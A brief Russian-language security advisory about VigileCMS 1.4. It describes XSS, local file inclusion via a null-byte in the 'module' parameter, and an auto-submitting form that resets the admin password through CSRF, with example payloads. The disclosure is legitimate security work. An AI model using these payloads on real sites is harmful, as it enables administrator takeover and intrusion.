Программа: VigileCMS 1.4

Найденные уязвимости позволяют удаленному злоумышленнику осуществить XSS атаку, выполнить произвольный сценарий и обойти ограничения безопасности на целевой системе. Уязвимость возникает из-за ошибки в проверке входных данных в параметре «module» сценарием index.php. Эксплуатирование уязвимости позволит злоумышленнику осуществить XSS нападение, выполнить произвольный сценарий и обойти ограничения безопасности на целевой системе.

Примеры:

XSS:

http://[site]/[path]/index.php?module=vedipm&inviapm=true
http://[site]/[path]/index.php?module=live_chat

LFI:

http://[site]/[path]/index.php?module=[somefile]%00

Изменение пароля администратора:

<form name="cambia" method="post" action="http://127.0.0.1/VIGILE_1.4/index.php?module=changepass">
<input type="password" name="new1" maxlength=20 value="123456">
<input type="password" name="new2" maxlength=20 value="123456">
<input type="hidden" name="pw" value="Cambia la Password">
</form>
<script>document.cambia.submit()</script>

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии